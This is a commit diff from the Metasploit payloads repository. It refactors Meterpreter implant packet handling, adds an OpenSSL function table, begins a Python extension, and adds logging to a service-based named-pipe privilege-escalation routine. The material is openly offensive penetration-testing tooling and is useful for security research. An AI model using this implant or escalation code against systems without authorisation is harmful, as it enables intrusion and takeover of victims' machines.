github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2024-12-21 05:35:54 +01:00
Code Releases Activity

Land #37, #38, #39: initial meterpreter python extension + modules

Browse Source
This commit is contained in:
Brent Cook 2015-10-30 15:23:34 -05:00
commit 44e8f7235d
No known key found for this signature in database
GPG Key ID: 1FFAA0B24B708F96
53 changed files with 4490 additions and 117 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

37
COPYING Normal file
View File

@ -0,0 +1,37 @@
Copyright (C) 2006-2015, Rapid7, Inc.
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of Rapid7, Inc. nor the names of its contributors
may be used to endorse or promote products derived from this software
without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
================================================================================
The Metasploit Payloads project is provided under the 3-clause BSD license above.
The copyright on this package is held by Rapid7, Inc.
This license does not apply to some components within the Metasploit
Payloads source tree. For more details see the LICENSE file.

99
LICENSE Normal file
View File

@ -0,0 +1,99 @@
Format: http://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
Source: http://www.metasploit.com/
Files: *
Copyright: 2006-2015, Rapid7, Inc.
License: BSD-3-clause
# The Metasploit Payloads project is provided under the 3-clause BSD license provided
# at the end of this file.
#
# The copyright on this package is held by Rapid7, Inc.
#
# This license does not apply to third-party components detailed below.
#
# Last updated: 2015-Oct-12
#
Files: c/meterpreter/source/extensions/python/*
Copyright: 2001-2015 Python Software Foundation. All rights reserved.
License: Python-2.0
License: BSD-3-clause
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
.
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
.
* Neither the name of Rapid7, Inc. nor the names of its contributors
may be used to endorse or promote products derived from this software
without specific prior written permission.
.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
License: Python-2.0
Python License, Version 2 (Python-2.0)
PYTHON SOFTWARE FOUNDATION LICENSE VERSION 2
--------------------------------------------
1. This LICENSE AGREEMENT is between the Python Software Foundation
("PSF"), and the Individual or Organization ("Licensee") accessing and
otherwise using this software ("Python") in source or binary form and
its associated documentation.
2. Subject to the terms and conditions of this License Agreement, PSF
hereby grants Licensee a nonexclusive, royalty-free, world-wide
license to reproduce, analyze, test, perform and/or display publicly,
prepare derivative works, distribute, and otherwise use Python
alone or in any derivative version, provided, however, that PSF's
License Agreement and PSF's notice of copyright, i.e., "Copyright (c)
2001, 2002, 2003, 2004, 2005, 2006 Python Software Foundation; All Rights
Reserved" are retained in Python alone or in any derivative version
prepared by Licensee.
3. In the event Licensee prepares a derivative work that is based on
or incorporates Python or any part thereof, and wants to make
the derivative work available to others as provided herein, then
Licensee hereby agrees to include in any such work a brief summary of
the changes made to Python.
4. PSF is making Python available to Licensee on an "AS IS"
basis. PSF MAKES NO REPRESENTATIONS OR WARRANTIES, EXPRESS OR
IMPLIED. BY WAY OF EXAMPLE, BUT NOT LIMITATION, PSF MAKES NO AND
DISCLAIMS ANY REPRESENTATION OR WARRANTY OF MERCHANTABILITY OR FITNESS
FOR ANY PARTICULAR PURPOSE OR THAT THE USE OF PYTHON WILL NOT
INFRINGE ANY THIRD PARTY RIGHTS.
5. PSF SHALL NOT BE LIABLE TO LICENSEE OR ANY OTHER USERS OF PYTHON
FOR ANY INCIDENTAL, SPECIAL, OR CONSEQUENTIAL DAMAGES OR LOSS AS
A RESULT OF MODIFYING, DISTRIBUTING, OR OTHERWISE USING PYTHON,
OR ANY DERIVATIVE THEREOF, EVEN IF ADVISED OF THE POSSIBILITY THEREOF.
6. This License Agreement will automatically terminate upon a material
breach of its terms and conditions.
7. Nothing in this License Agreement shall be deemed to create any
relationship of agency, partnership, or joint venture between PSF and
Licensee. This License Agreement does not grant permission to use PSF
trademarks or trade name in a trademark sense to endorse or promote
products or services of Licensee, or any third party.
8. By copying, installing or otherwise using Python, Licensee
agrees to be bound by the terms and conditions of this License
Agreement.

1
c/meterpreter/.gitignore vendored
View File

@ -32,6 +32,7 @@ Release
# VS local dbs # VS local dbs
*.sdf *.sdf
*.opensdf *.opensdf
*.aps
# VS ipch # VS ipch
workspace/ipch/* workspace/ipch/*

8
c/meterpreter/source/common/base.c Normal file → Executable file
View File

@ -380,7 +380,10 @@ BOOL command_process_inline(Command *baseCommand, Command *extensionCommand, Rem
dprintf("[COMMAND] Exception hit in command %s", lpMethod); dprintf("[COMMAND] Exception hit in command %s", lpMethod);
} }
packet_destroy(packet); if (!packet->local)
{
packet_destroy(packet);
}
return serverContinue; return serverContinue;
} }
@ -486,7 +489,8 @@ BOOL command_handle(Remote *remote, Packet *packet)
// if either command is registered as inline, run them inline // if either command is registered as inline, run them inline
if ((baseCommand && command_is_inline(baseCommand, packet)) if ((baseCommand && command_is_inline(baseCommand, packet))
|| (extensionCommand && command_is_inline(extensionCommand, packet))) || (extensionCommand && command_is_inline(extensionCommand, packet))
|| packet->local)
{ {
dprintf("[DISPATCH] Executing inline: %s", lpMethod); dprintf("[DISPATCH] Executing inline: %s", lpMethod);
result = command_process_inline(baseCommand, extensionCommand, remote, packet); result = command_process_inline(baseCommand, extensionCommand, remote, packet);

14
c/meterpreter/source/common/base_dispatch_common.c Normal file → Executable file
View File

@ -167,11 +167,10 @@ DWORD remote_request_core_channel_write(Remote *remote, Packet *packet)
// Transmit the acknowledgement // Transmit the acknowledgement
if (response) if (response)
{ {
packet_add_tlv_uint(response, TLV_TYPE_RESULT, res);
packet_add_tlv_uint(response, TLV_TYPE_LENGTH, written); packet_add_tlv_uint(response, TLV_TYPE_LENGTH, written);
packet_add_tlv_uint(response, TLV_TYPE_CHANNEL_ID, channelId); packet_add_tlv_uint(response, TLV_TYPE_CHANNEL_ID, channelId);
res = PACKET_TRANSMIT(remote, response, NULL); res = packet_transmit_response(res, remote, response);
} }
return res; return res;
@ -280,11 +279,10 @@ DWORD remote_request_core_channel_read(Remote *remote, Packet *packet)
// Transmit the acknowledgement // Transmit the acknowledgement
if (response) if (response)
{ {
packet_add_tlv_uint(response, TLV_TYPE_RESULT, res);
packet_add_tlv_uint(response, TLV_TYPE_LENGTH, bytesRead); packet_add_tlv_uint(response, TLV_TYPE_LENGTH, bytesRead);
packet_add_tlv_uint(response, TLV_TYPE_CHANNEL_ID, channelId); packet_add_tlv_uint(response, TLV_TYPE_CHANNEL_ID, channelId);
res = PACKET_TRANSMIT(remote, response, NULL); res = packet_transmit_response(res, remote, response);
} }
return res; return res;
@ -331,9 +329,7 @@ DWORD remote_request_core_channel_close(Remote *remote, Packet *packet)
// Transmit the acknowledgement // Transmit the acknowledgement
if (response) if (response)
{ {
packet_add_tlv_uint(response, TLV_TYPE_RESULT, res); res = packet_transmit_response(res, remote, response);
res = PACKET_TRANSMIT(remote, response, NULL);
} }
return res; return res;
@ -609,9 +605,7 @@ DWORD remote_request_core_crypto_negotiate(Remote *remote, Packet *packet)
// Transmit a response // Transmit a response
if (response) if (response)
{ {
packet_add_tlv_uint(response, TLV_TYPE_RESULT, res); res = packet_transmit_response(res, remote, response);
PACKET_TRANSMIT(remote, response, NULL);
} }
return ERROR_SUCCESS; return ERROR_SUCCESS;

0
c/meterpreter/source/common/common.h Normal file → Executable file
View File

31
c/meterpreter/source/common/core.c Normal file → Executable file
View File

@ -288,6 +288,15 @@ Packet *packet_create_response(Packet *request)
// Add the request identifier to the packet // Add the request identifier to the packet
packet_add_tlv_string(response, TLV_TYPE_REQUEST_ID, (PCHAR)requestId.buffer); packet_add_tlv_string(response, TLV_TYPE_REQUEST_ID, (PCHAR)requestId.buffer);
// If the packet that is being handled is considered local, then we
// associate the response with the request so that it can be handled
// locally (and vice versa)
if (request->local)
{
request->partner = response;
response->partner = request;
}
success = TRUE; success = TRUE;
} while (0); } while (0);
@ -1227,9 +1236,21 @@ DWORD packet_transmit_empty_response(Remote *remote, Packet *packet, DWORD res)
return ERROR_NOT_ENOUGH_MEMORY; return ERROR_NOT_ENOUGH_MEMORY;
} }
// Add the result code return packet_transmit_response(res, remote, response);
packet_add_tlv_uint(response, TLV_TYPE_RESULT, res); }
// Transmit the response /*!
return PACKET_TRANSMIT(remote, response, NULL); * @brief Transmit a `TLV_TYPE_RESULT` response if `response` is present.
* @param result The result to be sent.
* @param remote Reference to the remote connection to send the response to.
* @param response the Response to add the `result` to.
*/
DWORD packet_transmit_response(DWORD result, Remote* remote, Packet* response)
{
if (response)
{
packet_add_tlv_uint(response, TLV_TYPE_RESULT, result);
return PACKET_TRANSMIT(remote, response, NULL);
}
return ERROR_NOT_ENOUGH_MEMORY;
} }

20
c/meterpreter/source/common/core.h Normal file → Executable file
View File

@ -203,6 +203,11 @@ typedef struct _Packet
ULONG payloadLength; ULONG payloadLength;
LIST * decompressed_buffers; LIST * decompressed_buffers;
///! @brief Flag indicating if this packet is a local (ie. non-transmittable) packet.
BOOL local;
///! @brief Pointer to the associated packet (response/request)
struct _Packet* partner;
} Packet; } Packet;
typedef struct _DECOMPRESSED_BUFFER typedef struct _DECOMPRESSED_BUFFER
@ -263,20 +268,9 @@ LINKAGE DWORD packet_get_result(Packet *packet);
/* /*
* Packet transmission * Packet transmission
*/ */
LINKAGE DWORD packet_transmit_response(DWORD result, Remote* remote, Packet* response);
LINKAGE DWORD packet_transmit_empty_response(Remote *remote, Packet *packet, DWORD res); LINKAGE DWORD packet_transmit_empty_response(Remote *remote, Packet *packet, DWORD res);
#define PACKET_TRANSMIT(remote, packet, completion) (remote->transport->packet_transmit(remote, packet, completion)) #define PACKET_TRANSMIT(remote, packet, completion) ((packet->partner==NULL||!packet->partner->local)?(remote->transport->packet_transmit(remote, packet, completion)):(ERROR_SUCCESS))
/*!
* @brief Transmit a `TLV_TYPE_RESULT` response if `response` is present.
* @param result The result to be sent.
* @param remote Reference to the remote connection to send the response to.
* @param response the Response to add the `result` to.
*/
#define packet_transmit_response(result, remote, response) \
if (response) { \
packet_add_tlv_uint(response, TLV_TYPE_RESULT, result); \
PACKET_TRANSMIT(remote, response, NULL); \
}
/* /*
* Packet completion notification * Packet completion notification

38
c/meterpreter/source/common/list.c Normal file → Executable file
View File

@ -286,6 +286,44 @@ BOOL list_delete(PLIST pList, DWORD index)
return result; return result;
} }
/*!
* @brief Clear the contents of the list
* @param pList Pointer to the \c LIST to clear.
* @param pFunc Pointer to the function to run on each data node (if any).
* @returns Indication of success or failure.
*/
BOOL list_clear(PLIST pList, PCLEARFUNC pFunc)
{
PNODE pNode = NULL;
PNODE pFree = NULL;
if (pList == NULL)
{
return FALSE;
}
lock_acquire(pList->lock);
pNode = pList->start;
while (pNode != NULL)
{
if (pFunc)
{
pFunc(pNode->data);
}
pFree = pNode;
pNode = pNode->next;
free(pFree);
}
pList->start = pList->end = NULL;
lock_release(pList->lock);
return TRUE;
}
/*! /*!
* @brief Push a data item onto the end of the list. * @brief Push a data item onto the end of the list.
* @param pList Pointer to the \c LIST to append the data to. * @param pList Pointer to the \c LIST to append the data to.

2
c/meterpreter/source/common/list.h Normal file → Executable file
View File

@ -23,11 +23,13 @@ typedef struct _LIST
} LIST, *PLIST; } LIST, *PLIST;
typedef BOOL (*PLISTENUMCALLBACK)(LPVOID pState, LPVOID pData); typedef BOOL (*PLISTENUMCALLBACK)(LPVOID pState, LPVOID pData);
typedef VOID (*PCLEARFUNC)(LPVOID pData);
LIST * list_create(VOID); LIST * list_create(VOID);
VOID list_destroy(PLIST pList); VOID list_destroy(PLIST pList);
DWORD list_count(PLIST pList); DWORD list_count(PLIST pList);
LPVOID list_get(PLIST pList, DWORD index); LPVOID list_get(PLIST pList, DWORD index);
BOOL list_clear(PLIST pList, PCLEARFUNC pFunc);
BOOL list_add(PLIST pList, LPVOID data); BOOL list_add(PLIST pList, LPVOID data);
BOOL list_remove(PLIST pList, LPVOID data); BOOL list_remove(PLIST pList, LPVOID data);
BOOL list_delete(PLIST pList, DWORD index); BOOL list_delete(PLIST pList, DWORD index);

142
c/meterpreter/source/common/remote.h
View File

@ -9,6 +9,11 @@
#include "thread.h" #include "thread.h"
#include "config.h" #include "config.h"
// Include SSL related declarations for required pointers.
#include "openssl/ssl.h"
#include "openssl/err.h"
#include "openssl/x509v3.h"
/*! @brief This is the size of the certificate hash that is validated (sha1) */ /*! @brief This is the size of the certificate hash that is validated (sha1) */
#define CERT_HASH_SIZE 20 #define CERT_HASH_SIZE 20
@ -24,6 +29,7 @@ typedef CHARTYPE* STRTYPE;
typedef struct _Packet Packet; typedef struct _Packet Packet;
typedef struct _PacketRequestCompletion PacketRequestCompletion; typedef struct _PacketRequestCompletion PacketRequestCompletion;
typedef struct _Transport Transport; typedef struct _Transport Transport;
typedef struct _SslLib SslLib;
typedef struct _Remote Remote; typedef struct _Remote Remote;
typedef struct _TimeoutSettings TimeoutSettings; typedef struct _TimeoutSettings TimeoutSettings;
typedef struct _HttpTransportContext HttpTransportContext; typedef struct _HttpTransportContext HttpTransportContext;
@ -57,6 +63,138 @@ typedef struct _TimeoutSettings
UINT retry_wait; UINT retry_wait;
} TimeoutSettings; } TimeoutSettings;
#ifdef _WIN32
typedef struct _SslLib
{
int(*RAND_status)();
void(*RAND_add)(const void*, int, double);
int(*RAND_egd)(const char *path);
ERR_STATE*(*ERR_get_state)();
const char*(*ERR_reason_error_string)(unsigned long);
void(*ERR_clear_error)();
unsigned long(*ERR_peek_last_error)();
const COMP_METHOD *(*SSL_get_current_compression)(SSL*);
void*(*SSL_get_ex_data)(const SSL*, int);
SSL_CTX*(*SSL_set_SSL_CTX)(SSL*, SSL_CTX*);
SSL_CTX*(*SSL_get_SSL_CTX)(const SSL*);
int(*SSL_CTX_load_verify_locations)(SSL_CTX*, const char*, const char*);
int(*SSL_CTX_set_default_verify_paths)(SSL_CTX*);
int(*SSL_get_shutdown)(const SSL*);
int(*SSL_library_init)();
void(*SSL_set_accept_state)(SSL*);
void(*SSL_set_connect_state)(SSL*);
int(*SSL_shutdown)(SSL*);
int(*SSL_do_handshake)(SSL*);
SSL_METHOD *(*TLSv1_method)();
SSL_METHOD*(*SSLv23_method)();
SSL_METHOD*(*SSLv3_method)();
SSL_METHOD*(*SSLv2_method)();
const char*(*SSL_get_version)(const SSL*);
int(*SSL_get_error)(const SSL*, int);
long(*SSL_CTX_callback_ctrl)(SSL_CTX*, int, void(*)(void));
long(*SSL_CTX_ctrl)(SSL_CTX*, int, long, void*);
void(*SSL_free)(SSL*);
int(*SSL_read)(SSL*, void*, int);
int(*SSL_write)(SSL*, const void*, int);
SSL*(*SSL_new)(SSL_CTX*);
int(*SSL_CTX_set_session_id_context)(SSL_CTX*, const unsigned char*, unsigned int);
int(*SSL_CTX_check_private_key)(const SSL_CTX*);
void(*SSL_CTX_set_default_passwd_cb)(SSL_CTX*, pem_password_cb*);
void(*SSL_CTX_set_default_passwd_cb_userdata)(SSL_CTX*, void*);
int(*SSL_set_ex_data)(SSL *ssl, int idx, void *data);
long(*SSL_ctrl)(SSL *ssl, int cmd, long larg, void *parg);
void(*SSL_CTX_set_verify)(SSL_CTX *ctx, int mode, int(*callback)(int, X509_STORE_CTX *));
int(*SSL_CTX_get_verify_mode)(const SSL_CTX *ctx);
X509*(*SSL_get_peer_certificate)(const SSL *s);
void(*SSL_load_error_strings)(void);
int(*SSL_CTX_use_certificate_chain_file)(SSL_CTX *ctx, const char *file); /* PEM type */
int(*SSL_CTX_use_PrivateKey_file)(SSL_CTX *ctx, const char *file, int type);
void(*SSL_set_read_ahead)(SSL *s, int yes);
BIO*(*SSL_get_wbio)(const SSL *s);
BIO*(*SSL_get_rbio)(const SSL *s);
int(*SSL_set_fd)(SSL *s, int fd);
int(*SSL_pending)(const SSL *s);
char*(*SSL_CIPHER_get_version)(const SSL_CIPHER *c);
const char*(*SSL_CIPHER_get_name)(const SSL_CIPHER *c);
int(*SSL_CIPHER_get_bits)(const SSL_CIPHER *c, int *alg_bits);
SSL_CIPHER*(*SSL_get_current_cipher)(const SSL *s);
X509_STORE*(*SSL_CTX_get_cert_store)(const SSL_CTX *);
void(*SSL_CTX_free)(SSL_CTX *);
SSL_CTX *(*SSL_CTX_new)(SSL_METHOD *meth);
int(*SSL_CTX_set_cipher_list)(SSL_CTX *, const char *str);
size_t(*SSL_get_finished)(const SSL *s, void *buf, size_t count);
size_t(*SSL_get_peer_finished)(const SSL *s, void *buf, size_t count);
const char*(*SSL_get_servername)(const SSL *s, const int type);
int(*PEM_read_bio)(BIO *bp, char **name, char **header, unsigned char **data, long *len);
X509*(*PEM_read_bio_X509)(BIO *bp, X509 **x, pem_password_cb *cb, void *u);
X509*(*PEM_read_bio_X509_AUX)(BIO *bp, X509 **x, pem_password_cb *cb, void *u);
int(*X509_check_ca)(X509 *x);
DH *(*PEM_read_bio_DHparams)(BIO *bp, DH **x, pem_password_cb *cb, void *u);
X509V3_EXT_METHOD *(*X509V3_EXT_get)(X509_EXTENSION *ext);
void(*AUTHORITY_INFO_ACCESS_free)(AUTHORITY_INFO_ACCESS* a);
int(*GENERAL_NAME_print)(BIO* out, GENERAL_NAME* gen);
void(*GENERAL_NAME_free)(GENERAL_NAME* gen);
int(*X509_add_ext)(X509 *x, X509_EXTENSION *ex, int loc);
void*(*X509_get_ext_d2i)(X509 *x, int nid, int *crit, int *idx);
int(*X509_get_ext_by_NID)(X509 *x, int nid, int lastpos);
ASN1_OBJECT*(*X509_NAME_ENTRY_get_object)(X509_NAME_ENTRY *ne);
ASN1_STRING*(*X509_NAME_ENTRY_get_data)(X509_NAME_ENTRY *ne);
X509_NAME_ENTRY*(*X509_NAME_get_entry)(X509_NAME *name, int loc);
int(*X509_NAME_entry_count)(X509_NAME *name);
X509_NAME*(*X509_get_subject_name)(X509 *a);
ASN1_INTEGER*(*X509_get_serialNumber)(X509 *x);
X509_EXTENSION*(*X509_get_ext)(X509 *x, int loc);
X509_NAME*(*X509_get_issuer_name)(X509 *a);
void(*X509_free)(X509*);
int(*i2d_X509)(X509* a, unsigned char** out);
char*(*sk_value)(const STACK*, int);
int(*sk_num)(const STACK* s);
void(*sk_pop_free)(STACK *st, void (*func)(void *));
const char*(*SSLeay_version)(int type);
unsigned long(*SSLeay)(void);
int(*CRYPTO_num_locks)(void);
void(*CRYPTO_set_locking_callback)(void (*func)(int mode,int type, const char *file,int line));
void(*CRYPTO_set_id_callback)(unsigned long (*func)(void));
void(*CRYPTO_free)(void* p);
BIO_METHOD*(*BIO_s_file)(void);
BIO*(*BIO_new_file)(const char *filename, const char *mode);
BIO*(*BIO_new)(BIO_METHOD *type);
int(*BIO_gets)(BIO *bp,char *buf, int size);
long(*BIO_ctrl)(BIO *bp,int cmd,long larg,void *parg);
BIO_METHOD*(*BIO_s_mem)(void);
BIO*(*BIO_new_mem_buf)(void *buf, int len);
int(*BIO_free)(BIO *a);
void(*ASN1_OBJECT_free)(ASN1_OBJECT *a);
int(*ASN1_STRING_length)(ASN1_STRING *x);
unsigned char*(*ASN1_STRING_data)(ASN1_STRING *x);
int(*i2a_ASN1_INTEGER)(BIO *bp, ASN1_INTEGER *a);
long(*ASN1_INTEGER_get)(ASN1_INTEGER *a);
int(*ASN1_STRING_to_UTF8)(unsigned char **out, ASN1_STRING *in);
int(*ASN1_TIME_print)(BIO *fp,ASN1_TIME *a);
ASN1_VALUE*(*ASN1_item_d2i)(ASN1_VALUE **val, const unsigned char **in, long len, const ASN1_ITEM *it);
ASN1_OBJECT*(*OBJ_nid2obj)(int n);
const char*(*OBJ_nid2ln)(int n);
const char*(*OBJ_nid2sn)(int n);
int(*OBJ_obj2nid)(const ASN1_OBJECT *o);
ASN1_OBJECT*(*OBJ_txt2obj)(const char *s, int no_name);
int(*OBJ_obj2txt)(char *buf, int buf_len, const ASN1_OBJECT *a, int no_name);
int(*OBJ_sn2nid)(const char *s);
void(*OPENSSL_add_all_algorithms_noconf)(void);
EC_KEY*(*EC_KEY_new_by_curve_name)(int nid);
void(*EC_KEY_free)(EC_KEY *);
void(*DH_free)(DH *dh);
int(*X509_STORE_add_cert)(X509_STORE *ctx, X509 *x);
int(*X509_VERIFY_PARAM_set_flags)(X509_VERIFY_PARAM *param, unsigned long flags);
int(*X509_VERIFY_PARAM_clear_flags)(X509_VERIFY_PARAM *param, unsigned long flags);
unsigned long(*X509_VERIFY_PARAM_get_flags)(X509_VERIFY_PARAM *param);
X509*(*d2i_X509_bio)(BIO *bp,X509 **x509);
const char*(*X509_get_default_cert_dir)();
const char*(*X509_get_default_cert_file)();
const char*(*X509_get_default_cert_dir_env)();
const char*(*X509_get_default_cert_file_env)();
} SslLib;
#endif
typedef struct _TcpTransportContext typedef struct _TcpTransportContext
{ {
SOCKET fd; ///! Remote socket file descriptor. SOCKET fd; ///! Remote socket file descriptor.
@ -159,6 +297,10 @@ typedef struct _Remote
int sess_expiry_time; ///! Number of seconds that the session runs for. int sess_expiry_time; ///! Number of seconds that the session runs for.
int sess_expiry_end; ///! Unix timestamp for when the server should shut down. int sess_expiry_end; ///! Unix timestamp for when the server should shut down.
int sess_start_time; ///! Unix timestamp representing the session startup time. int sess_start_time; ///! Unix timestamp representing the session startup time.
#ifdef _WIN32
SslLib ssl; ///! Pointer to SSL related functions, for sharing across extensions.
#endif
} Remote; } Remote;
Remote* remote_allocate(); Remote* remote_allocate();

4
c/meterpreter/source/extensions/priv/server/elevate/namedpipe.c Normal file → Executable file
View File

@ -165,9 +165,11 @@ DWORD elevate_via_service_namedpipe(Remote * remote, Packet * packet)
// start the elevator service (if it doesnt start first time we need to create it and then start it). // start the elevator service (if it doesnt start first time we need to create it and then start it).
if (service_start(cpServiceName) != ERROR_SUCCESS) { if (service_start(cpServiceName) != ERROR_SUCCESS) {
dprintf("[ELEVATE] service starting failed, attempting to create");
if (service_create(cpServiceName, cServiceArgs) != ERROR_SUCCESS) { if (service_create(cpServiceName, cServiceArgs) != ERROR_SUCCESS) {
BREAK_ON_ERROR("[ELEVATE] elevate_via_service_namedpipe. service_create failed"); BREAK_ON_ERROR("[ELEVATE] elevate_via_service_namedpipe. service_create failed");
} }
dprintf("[ELEVATE] creation of service succeeded, attempting to start");
// we dont check a return value for service_start as we expect it to fail as cmd.exe is not // we dont check a return value for service_start as we expect it to fail as cmd.exe is not
// a valid service and it will never signal to the service manager that is is a running service. // a valid service and it will never signal to the service manager that is is a running service.
service_start(cpServiceName); service_start(cpServiceName);
@ -180,10 +182,12 @@ DWORD elevate_via_service_namedpipe(Remote * remote, Packet * packet)
thread_join(pThread); thread_join(pThread);
// get the exit code for our pthread // get the exit code for our pthread
dprintf("[ELEVATE] dwResult before exit code: %u", dwResult);
if (!GetExitCodeThread(pThread->handle, &dwResult)) { if (!GetExitCodeThread(pThread->handle, &dwResult)) {
BREAK_WITH_ERROR("[ELEVATE] elevate_via_service_namedpipe. GetExitCodeThread failed", BREAK_WITH_ERROR("[ELEVATE] elevate_via_service_namedpipe. GetExitCodeThread failed",
ERROR_INVALID_HANDLE); ERROR_INVALID_HANDLE);
} }
dprintf("[ELEVATE] dwResult after exit code: %u", dwResult);
} while (0); } while (0);

3
c/meterpreter/source/extensions/priv/server/elevate/service.c Normal file → Executable file
View File

@ -106,6 +106,8 @@ DWORD service_create( char * cpName, char * cpPath )
HANDLE hManager = NULL; HANDLE hManager = NULL;
HANDLE hService = NULL; HANDLE hService = NULL;
dprintf("[SERVICE] attempting to create service: %s / %s", cpName, cpPath);
do do
{ {
if( !cpName || !cpPath ) if( !cpName || !cpPath )
@ -119,6 +121,7 @@ DWORD service_create( char * cpName, char * cpPath )
if( !hService ) if( !hService )
BREAK_ON_ERROR( "[SERVICE] service_create. CreateServiceA failed" ); BREAK_ON_ERROR( "[SERVICE] service_create. CreateServiceA failed" );
dprintf("[SERVICE] service created: %s / %s", cpName, cpPath);
} while( 0 ); } while( 0 );
if( hService ) if( hService )

2
c/meterpreter/source/extensions/python/Lib/meterpreter/__init__.py Normal file
View File

@ -0,0 +1,2 @@
__all__ = ['core', 'elevate']

208
c/meterpreter/source/extensions/python/Lib/meterpreter/core.py Normal file
View File

@ -0,0 +1,208 @@
import sys, struct, random, string, meterpreter_bindings
# A stack of this stuff was stolen from the Python Meterpreter. We should look
# to find a nice way of sharing this across the two without the duplication.
#
# START OF COPY PASTE
#
# Constants
#
# these values will be patched, DO NOT CHANGE THEM
DEBUGGING = False
HTTP_CONNECTION_URL = None
HTTP_PROXY = None
HTTP_USER_AGENT = None
PAYLOAD_UUID = ''
SESSION_COMMUNICATION_TIMEOUT = 300
SESSION_EXPIRATION_TIMEOUT = 604800
SESSION_RETRY_TOTAL = 3600
SESSION_RETRY_WAIT = 10
PACKET_TYPE_REQUEST = 0
PACKET_TYPE_RESPONSE = 1
PACKET_TYPE_PLAIN_REQUEST = 10
PACKET_TYPE_PLAIN_RESPONSE = 11
ERROR_SUCCESS = 0
# not defined in original C implementation
ERROR_FAILURE = 1
ERROR_FAILURE_PYTHON = 2
ERROR_FAILURE_WINDOWS = 3
CHANNEL_CLASS_BUFFERED = 0
CHANNEL_CLASS_STREAM = 1
CHANNEL_CLASS_DATAGRAM = 2
CHANNEL_CLASS_POOL = 3
#
# TLV Meta Types
#
TLV_META_TYPE_NONE = ( 0 )
TLV_META_TYPE_STRING = (1 << 16)
TLV_META_TYPE_UINT = (1 << 17)
TLV_META_TYPE_RAW = (1 << 18)
TLV_META_TYPE_BOOL = (1 << 19)
TLV_META_TYPE_QWORD = (1 << 20)
TLV_META_TYPE_COMPRESSED = (1 << 29)
TLV_META_TYPE_GROUP = (1 << 30)
TLV_META_TYPE_COMPLEX = (1 << 31)
# not defined in original
TLV_META_TYPE_MASK = (1<<31)+(1<<30)+(1<<29)+(1<<19)+(1<<18)+(1<<17)+(1<<16)
#
# TLV base starting points
#
TLV_RESERVED = 0
TLV_EXTENSIONS = 20000
TLV_USER = 40000
TLV_TEMP = 60000
#
# TLV Specific Types
#
TLV_TYPE_ANY = TLV_META_TYPE_NONE | 0
TLV_TYPE_METHOD = TLV_META_TYPE_STRING | 1
TLV_TYPE_REQUEST_ID = TLV_META_TYPE_STRING | 2
TLV_TYPE_EXCEPTION = TLV_META_TYPE_GROUP | 3
TLV_TYPE_RESULT = TLV_META_TYPE_UINT | 4
TLV_TYPE_STRING = TLV_META_TYPE_STRING | 10
TLV_TYPE_UINT = TLV_META_TYPE_UINT | 11
TLV_TYPE_BOOL = TLV_META_TYPE_BOOL | 12
TLV_TYPE_LENGTH = TLV_META_TYPE_UINT | 25
TLV_TYPE_DATA = TLV_META_TYPE_RAW | 26
TLV_TYPE_FLAGS = TLV_META_TYPE_UINT | 27
TLV_TYPE_CHANNEL_ID = TLV_META_TYPE_UINT | 50
TLV_TYPE_CHANNEL_TYPE = TLV_META_TYPE_STRING | 51
TLV_TYPE_CHANNEL_DATA = TLV_META_TYPE_RAW | 52
TLV_TYPE_CHANNEL_DATA_GROUP = TLV_META_TYPE_GROUP | 53
TLV_TYPE_CHANNEL_CLASS = TLV_META_TYPE_UINT | 54
TLV_TYPE_CHANNEL_PARENTID = TLV_META_TYPE_UINT | 55
TLV_TYPE_SEEK_WHENCE = TLV_META_TYPE_UINT | 70
TLV_TYPE_SEEK_OFFSET = TLV_META_TYPE_UINT | 71
TLV_TYPE_SEEK_POS = TLV_META_TYPE_UINT | 72
TLV_TYPE_EXCEPTION_CODE = TLV_META_TYPE_UINT | 300
TLV_TYPE_EXCEPTION_STRING = TLV_META_TYPE_STRING | 301
